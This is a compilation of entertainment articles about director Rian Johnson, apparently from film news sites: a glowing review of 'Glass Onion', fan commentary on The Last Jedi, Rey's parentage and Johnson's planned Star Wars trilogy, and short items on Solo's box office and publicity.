Rian Johnson’s “Knives Out” was a wonderful breath of fresh air — an original film with a stellar cast and a funny, engrossing mystery with twists and turns. It reminded us that movies could be, ya know, fun. Seemingly the moment the movie ended, audiences wanted more. Specifically, they wanted the return of Benoit Blanc, the gentleman sleuth with the deep-fried accent, played to perfection by Daniel Craig. Sure enough, Netflix came calling, plunking down a huge chunk of change for Johnson to make not one but two more Benoit Blanc movies. But could Johnson ever match the mystery magic he created in the first film?
The answer is a resounding yes. With “Glass Onion: A Knives Out Mystery,” Johnson has brought back Blanc for an even bigger, funnier, twistier whodunnit. Not only does Johnson recapture what made the first flick so special, he actually outdoes himself. Yes, “Glass Onion” is even better than “Knives Out.” The key ingredient to that success is that Johnson doesn’t try to remake the first film. Yes, Benoit Blanc is once again knee-deep in a murder mystery and surrounded by a cast of suspects, but Johnson isn’t interested in giving us the same old same old. Instead, he goes bigger, building a complex mystery that towers over the first film’s crime.
But best of all, Johnson has ramped up the humor. “Knives Out” was plenty funny, but “Glass Onion” is loaded with huge belly-laugh moments and the types of ultra-clever jokes that will make you want to cheer. What I’m getting at here is that this Rian Johnson fellow is very good at making movies.

“Glass Onion” begins by introducing us to our new cast of characters/suspects. There’s high-strung Senate candidate Claire (Kathryn Hahn); immensely clueless model turned fashion designer Birdie Jay (Kate Hudson) and her assistant Peg (Jessica Henwick); Duke (Dave Bautista), a men’s rights activist with a huge online following; Duke’s girlfriend Whiskey (Madelyn Cline); and Lionel (Leslie Odom Jr.), a scientist who works for a billion-dollar tech company. The tech company is owned by billionaire Miles Bron (Edward Norton), who is connected to all of these characters. And then there’s Andi (Janelle Monáe), Miles’ former business partner who had a falling out with Miles that resulted in a nasty court case.
All of these characters are invited to Miles’ private island for a weekend getaway. This is something he does with this group of friends every year, and this year, he wants to stage a murder mystery party. And who better to invite along than Benoit Blanc? Johnson plops the film firmly in the midst of the COVID-19 pandemic, and Blanc, who has been sheltering in place (remember when we did that?) has grown restless. He needs a case, and he jumps at the chance of heading to Mile’s island, even if it’s for a fake murder.
You can probably guess where this is going: the fake murder turns into a real one. But who gets bumped off, and how, I shall not say. The joys of “Glass Onion” involve the plot twists and shocking-but-hilarious revelations Johnson keeps throwing at us at breakneck speed. Every scene is loaded with lightning-sharp wit coupled with a genuinely engrossing mystery. Like Blanc, we’re hooked on the idea of solving this mystery.

In addition to the successful humor, Johnson also creates memorable set pieces that demand to be seen on the big screen. At one point, the lights go out at Miles’ massive compound, with a nearby lighthouse flashing occasional beams of light in the darkness as various characters scramble about.
Speaking of those characters, one of the draws of “Knives Out” was the ensemble cast, with Ana de Armas being a particular standout. But while the cast of that first film was swell, some of the characters felt undercooked or underused. With “Glass Onion,” Johnson remedies that by giving everyone a moment to shine. Hahn is her usual wonderful self, chewing her dialogue with gusto. Monáe is a huge standout, with a particularly tricky role. But everyone around her is also firing on all cylinders. Norton is particularly grand as the billionaire, playing the character with just the right amount of smug self-righteousness. And Hudson garners huge laughs with her dimwitted character. But make no mistake: this is Daniel Craig’s movie.
It might seem odd to claim that Craig’s best performance is in a “Knives Out” sequel; in fact, you might consider that hyperbole. But I stick by it. I have always enjoyed Craig’s work, but I have never enjoyed him as much as I did here. Blanc is even funnier this time around, and Johnson allows Craig to engage in some brief but uproarious slapstick. Forget James Bond — this was the role Craig was born to play. I can’t wait to see what case Benoit Blanc gets mixed up in next.

Star Wars is a franchise built entirely on continuity and the ongoing legacy of what has come before. Star Wars fans treasure the iconic characters and the sense of history and myth in perfect balance. This is one of the principal reasons there was such a backlash when The Last Jedi seemed to disregard so much of what has come before. “The past must die” became the mantra and now the man responsible has said it can also be applied to his own work.
Star Wars 7 knowingly and ruthlessly built up the mystery surrounding Rey’s lineage. The filmmakers knew which way fans were being led and encouraged it.
The big reveal in Star Wars 8 that she was “nothing”, the abandoned child of drunk lowlives felt like a slap in the face to many. As well as pulling the rug on the speculation she would be a secret Skywalker, Kenobi or even Palpatine, it also continued to fail to explain how she could have so much power and such instant skill, with no training and no lineage.
In a shock new interview this week, Episode VIII director Rian Johnson just said it can all be changed and he doesn’t care.
STAR WARS 9 LEAKS REVEAL THE LUKE SKYWALKER SCENE EVERYONE WAS WAITING FOR IN THE LAST JEDI
Asked if he minded if JJ Abrams completely retconned the Rey family storyline, Johnson shook his head and told MTV: “I want to be thrilled. I want him to do stuff that I wasn’t expecting him to do and just go along for the ride. For me, that’s why I go to the movies.”
This is great news for fans still hoping for a big Reyvelation (sorry).
However, Rey’s parentage isn’t actually the issue. It simply continues to illustrate what many see as the major issue with the Sequel Trilogy. How can one continuous storyline be split into three movies where each director has complete autonomy to make any changes and switches he likes to the previous film? Why allow a director with a clear commitment to subvert existing expectations to handle the middle film in a franchise?
STAR WARS TRAILER RELEASED DATE AND TIME AT STAR WARS CELEBRATION
Johnson is a filmmaker who firmly believes in bringing something new to every filmgoing experience and who is not interested in being constrained by existing frameworks.
He has never hidden this and these are fine attributes in a director. Unless, perhaps, you are making the eighth movie in a continuous nine-movie cycle.
The fact he is happy if JJ Abrams undoes some of The Last Jedi’s key plotlines is why so many fans were so unhappy with The Last Jedi in the first place.
Of course, Kylo Ren might have been lying to Rey or have received false information about her parents from Snoke or some other source. However, the entire hall of mirrors fake out followed by Kylo’s revelation intentionally trolled fans who had been eagerly following cues deliberately laid down by the franchise itself.
For any of the filmmakers to claim otherwise is disingenuous.
Back in 2017, there was huge excitement ahead of the release of The Last Jedi and Johnson was already proudly talking about his spin-off trilogy. He even revealed Disney had signed off on the idea with no script or characters in place. Episode 8 had a decidedly bumpy reception at the box office and split the fandom like never before. Tensions ran high and a backlash turned into a boycott, with fans accusing the director and Lucasfilm boss Kathleen Kennedy of disregarding and disrespecting the franchise’s core values and ideas.
Suddenly the future of Johnson’s trilogy seemed a lot less certain.
When Disney big boss Bob Iger made a declaration about the future of the Stra Wars franchise, Johnson’s name was notable by its absence.
He said: “We are just at the point where we’re gonna start making decisions about what comes next after JJ’s (Star Wars Episode 9). But I think we’re gonna be a little bit more careful about volume and timing.
“That doesn’t mean we’re not gonna make films. JJ [Abrams] is busy making [Episode] IX. We have creative entities, including [Game of Thrones creators David] Benioff and [D.B.] Weiss, who are developing sagas of their own, which we haven’t been specific about.”
This week, HBO boss Casey Bloys told TV LIne magazine why the Game of Thrones pair would not be immediately working on their next TV project, a controversial drama exploring an alternate America where slavery was never abolished.
He said “Dan and David are finishing up the final season [of Game of Thrones] and then they are going to go into the Star Wars universe. When they come out of that, I assume they will come back to us.”
“The delay has to do with [the fact] that they were offered three movies.”
Again this prompted rumours and reports that Johnson’s trilogy was now dead in the water.
Industry site SuperBroMovies published claims Johnson was “no longer attached to his own Star Wars trilogy.”
When upset fans asked Johnson to respond he tweeted: “No it isn’t true, I’m still working on the trilogy. With all due respect to the movie bros, who I’m sure are lovely kind bros with good fraternal intentions.”
It’s official then. Like or loathe what he did in The Last Jedi, the director is still very much a major part of the Star Wars future.

Forget Kylo Ren and the First Order, a galaxy much closer to home has been having some serious problems recently.
After the Han Solo movie performed shockingly badly there were claims that it was partly due to a boycott by fans furious about The Last Jedi. Numerous reports and rumours foloowed that Disney and Lucasfilm were being forced to reconsider various upcoming projects.
First there was a report in Deadline that the future Anthology Star Wars Story movies including Obi-wan and Boba Fett projects had been put on indefinite hold.
Then a more drastic rumour surfaced that Last Jedi director Rian Johnson could lose his spin-off trilogy.
A major article by US broadcaster ABC revealed an aofficial statement by Disney on the subject.
It said: “Lucasfilm sources on Thursday characterized as “inaccurate” a report that future Star Wars movies falling outside of the regular trilogy storyline (Episodes I to IX) have been put on hold in the wake of the box office under-performance of Solo: A Star Wars Story.
“Instead, Lucasfilm told ABC News there are still “multiple” Star Wars films currently in development that have not been officially announced.”
“Those projects are moving forward separate from an already-announced Star Wars trilogy being overseen by The Last Jedi director Rian Johnson and another series of movies from Game of Thrones producers David Benioff and D.B. Weiss.”
It is worth noting that ABC is also owned by Lucasfilm parent company Disney.
While the statement sets the facts straight, it is also a clear indication that Disney has felt the need to address the swirling rumors which can only harm the integrity and strength of the entire Star Wars franchise moving forward.
Is Disney worried?
Solo: A Star Wars Story has taken $ 353million worldwide since its release. The previous Anthology movie, Rogiue One, took just over a billion.
Solo is also reported to be the most expensive Star wars movie ever, after the considerable reshoots ordered when the original directors were fired. At the current time, it is expected to be the first Star Wars movie to lose money, a concept that was previously unthinkable.
The Last Jedi cracked $ 1.3billion, far down on The Force Awakens $ 2billion.
Are the fans abandoning Star Wars and what will Disney do about it?

Solo: A Star Wars Story was the first Star Wars movie to debut at Cannes since Revenge of the Sith! And it was apparently very, very well received as the film garnered a standing ovation at the fancy film festival in the south of France earlier this month.

Solo has been mired in controversy since director team Lord and Miller left early in production, and on the media trail for the film writer Jonathan Kasdan has been sharing how the split was “excruciating.” You can read the whole interview over at Indiewire.

The writer of Rogue One: A Star Wars Story, Gary Whitta, is always pretty funny on Twitter, but he outdid himself with this picture of a sketch that he did of the Death Star firing on Scarif from the last act of the bleak and beautiful Star Wars Story.
Alden Ehrenreich has been a total joy on the Solo: A Star Wars Story press circuit, and this great story about his first audition for Han Solo is no exception! “They have to be really secretive about Star Wars, so they can’t say ‘Oh, this is a scene with you and Chewbacca,’ and you have like a fake name,” he said. “Like, my fake name was Mike, and then they had me do a scene where I’m talking to a dog, and they had like a dog puppet in the audition, and then like a little dog sound effect.”
A fan favorite Expanded Universe character Ewok Princess Kneesaa has been brought back into canon via the fantastic Forces of Destiny cartoons. Luckily for the uninitiated, Star Wars Explained is on hand to give an introduction and comparison of her new canon version versus the one fans know and love from Legends.
Syfy Wire was on the scene at the Solo premiere, catching some great red carpet interviews with the cast. In a wonderful anecdote, Paul Bettany talked about the ridiculous secrecy on the sets of both Solo and Infinity War!

The long awaited Star Wars theme park is ever closer to becoming a reality, and as revealed on the Disney Parks website, Disney fans who head to the Galactic Nights event on Sunday, May 27 will be able to find out some of the secrets of Galaxy’s Edge at the exclusive panel that will be held at the evening events of Disney’s Hollywood Studios.

Donald Glover’s Lando Calrissian is one of the most anticipated parts of Solo: A Star Wars Story, and according to this interview with Cinema Blend, the musician / actor is fully aware of how culturally relevant his role in the franchise is. “It’s almost like full circle like I’m getting to be part of like, The Bible or something, you know what I’m saying? Like it feels like I get to be something original but also something as old as time,” Glover explained.

WARNING SPOILERS FOR THE LAST JEDI AHEAD
Back in 2015 Abrams’ The Force Awakens set up a number of big questions, including the identity of Rey’s parents.
Then came sequel The Last Jedi two years later, with fans expecting an amazing reveal.
However not everyone was happy, with Kylo Ren explaining to Rey that her parents were essentially nobodies.
Pegg continued: “I think that’s kind of been undone slightly by the last one.
“There was some talk about, you know, a kind of relevant lineage for her.
“But I honestly don’t know, and I don’t know if anybody knows. We shall see.”
Nevertheless Abrams has returned to finish the trilogy by writing and directing Episode IX.
If Abrams is unhappy with Johnson’s reveal that Rey’s parents are nobodies, he could just make it that Ren was lying to her to manipulate her.
Since the sequel trilogy is tying up the Skywalker saga, it would make much more sense for her to be related to Luke or Leia.
Star Wars Episode IX is released on December 20, 2019.

Rian Johnson is starting fresh with his new Star Wars trilogy. After throwing much of the Star Wars mythology out the window in Star Wars: The Last Jedi, he’s returning to the spirit of the original trilogy to shape his new films.
Johnson is still in the early stages of planning the new Star Wars trilogy, but he already has a vision of what those films will look like.
“I’m looking at everything right now,” Johnson told Digital Spy. “I’m honestly just in this very nice ‘OK, what is this thing going to be?’”
The new Star Wars trilogy will be the first series of films separate from the Skywalker saga. But Johnson said his new films will be more familiar than not:
“The only goal I have is to think about how Star Wars made me feel as a kid. And that’s it. I’m trying to capture: what is that, if it’s not iconography that we recognise, necessarily, from the original trilogy? What captures that spirit? What can be that for a kid who’s never heard of Star Wars? It’s getting back to the very fundamental questions of what makes this what it is.”
The true “spirit” of Star Wars is clearly up for debate, after the wrath that The Last Jedi incurred in some circles. I thought that The Last Jedi was truest to the spirit of the original trilogy, even if it took a radical approach to the mythology that the franchise has built. The Last Jedi returned to what made A New Hope so special: the fate of the galaxy in the hands of a farmboy “nobody” — before he became the fated Chosen One.
But it’s still very early in the process. Johnson could turn to Joseph Campbell’s classic hero’s journey, which the original Star Wars trilogy was structured around. He could evoke the classic iconography of the original films. Or he could interpret the true “spirit” of Star Wars in an entirely different way than fans have in mind. But Johnson is prepared for a little hate to come his way. He added:
“And then also just knowing that that’s just the flip side of the coin. You can’t take the good stuff without realising that with that same passion, you’re going to have people that are upset about stuff, but that’s not necessarily bad; it’s just both sides of the same coin of people really caring about this. You can’t take the good without the bad.”
What do you think Rian Johnson could tackle with his new Star Wars trilogy?
